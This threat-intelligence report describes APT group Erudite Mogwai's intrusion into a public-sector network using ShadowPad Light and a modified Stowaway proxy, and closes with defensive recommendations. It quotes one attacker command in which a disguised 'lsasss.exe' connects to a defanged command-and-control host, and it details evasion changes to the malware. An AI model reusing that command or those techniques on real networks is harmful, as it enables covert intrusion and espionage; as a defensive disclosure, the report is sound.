APT Group Erudite Mogwai Refines Stowaway for Covert Network Attacks

Summary

Cyble Research and Intelligence Labs came across a blog published by Solar detailing a cyberattack detected by the JSOC cyberattack counter center. The investigation uncovered Stowaway and ShadowPad Light malware in an unmonitored segment of a customer’s network. The attack began as early as March 2023 through publicly accessible web services, with an attempted expansion in November 2024.

The attackers modified Stowaway, incorporating LZ4 compression, XXTEA encryption, and QUIC protocol support to enhance obfuscation and traffic proxying. This activity is attributed to Erudite Mogwai, an advanced persistent threat (APT) group specializing in cyberespionage and data theft. Active since at least 2017, the group has targeted government agencies, IT departments, and high-tech industries in Russia, Georgia, and Mongolia. Positive Technologies previously identified Erudite Mogwai as Space Pirates in 2019, and the group has continuously evolved its tactics and tools.

Recent attacks have leveraged LuckyStrike Agent, a .NET backdoor utilizing OneDrive as a command-and-control (C2) channel, alongside ShadowPad Light (Deed RAT) and a custom version of Stowaway for network penetration. The group also employs various open-source network scanning utilities. Their methods suggest an East Asian origin, leading to their classification as part of the "mogwai" clusters.

Technical Details

In early November, Solar JSOC detected suspicious activity on a public sector customer's infrastructure, triggered by Impacket AtExec executing remote tasks and reconnaissance utilities. During the investigation, security teams discovered Stowaway running on multiple compromised systems, but no direct command-and-control (C2) servers were initially found. Instead, Stowaway instances were operating in port listening mode, likely to evade detection. However, a later discovery on an admin system revealed Stowaway launched with an active C2 server connection wiod[.]mynetav[.]net:443.

Command : C:\Windows\Tasks\lsasss.exe -c wiod[.]mynetav[.]net:443 -s -f AgreedUponByAllParties

Further analysis traced the attack back to a Windows server compromised in February 2024, where ShadowPad Light was deployed. This server was used for lateral movement and hosted over 20 attacker tools, including:

● Keylogger CopyCat

● Fscan (network scanning tool)

● Lscan (network testing utility)

● Netspy (internal network discovery tool)

● LuckyStrike Agent

● Sysinternals ADExplorer (Active Directory utility)

Investigators also identified an initial infection point—a non-domain workstation in the Access Control System (ACS), compromised in March 2023. This workstation was infected with ShadowPad Light and Stowaway, likely deployed from a previously breached Unix web server exposed to the internet in 2022-2023. Attackers brute-forced administrator credentials from this system between March and June 2023, allowing them to infiltrate the network and gradually expand access over 19 months before being detected in November 2024.

Evolution of the Stowaway Malware Stowaway, originally an open-source penetration testing tool, was heavily modified by the attackers. Key enhancements include:

1. Structural Changes:

● Removed UUID tracking and renamed functions to evade detection.

● Eliminated error messages and adjusted protocol structure.

2. Encryption and Compression Updates:

● LZ4 replaced Gzip for data compression.

● XXTEA replaced AES for encryption.

1. Code & Functionality Tweaks:

● Added custom authentication mechanisms and encrypted pre-authentication tokens. ▪ Introduced custom message exchange formats for stealth.

● Refined SOCKS5 proxy implementation for traffic redirection.

2. Protocol and Communication Adjustments:

● Attackers modified greeting messages (e.g., "Bohemian Rhapsody" ↔ "Queen") as a stealth tactic.

● Introduced QUIC protocol support, leveraging UDP-based encrypted communication for resilience and speed.

The “-f” argument in the attackers’ modified Stowaway serves as a self-verification mechanism to ensure the malware is running as expected.

Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

● Isolate critical systems and limit communication between network segments to reduce lateral movement. Deploy continuous monitoring and logging (SIEM) to detect suspicious activity, such as unauthorized proxy tools or unusual remote executions.

● Enforce strong authentication (MFA) for administrative access and regularly audit privileged accounts. Monitor for brute-force attempts and restrict the use of remote task execution tools like Impacket AtExec.

● Regularly update endpoint protection to detect customized malware and unauthorized SOCKS5 proxies. Use behavior-based detection to spot modifications of open-source tools and block unauthorized execution of binaries in sensitive environments.

Conclusion

The attackers used ShadowPad Light to deploy a modified version of Stowaway, enabling network persistence, reconnaissance, and lateral movement over nearly two years before reaching monitored segments in late 2024. Their custom Stowaway fork retained only SOCKS5 proxying while removing unnecessary features, renaming functions, and altering structures to evade detection.

Key modifications include LZ4 compression, XXTEA encryption, QUIC protocol support, and a built-in verification mechanism using MD5 hashing to control execution. These changes highlight the attackers' advanced capabilities and strategic use of open-source tools for stealth and persistence.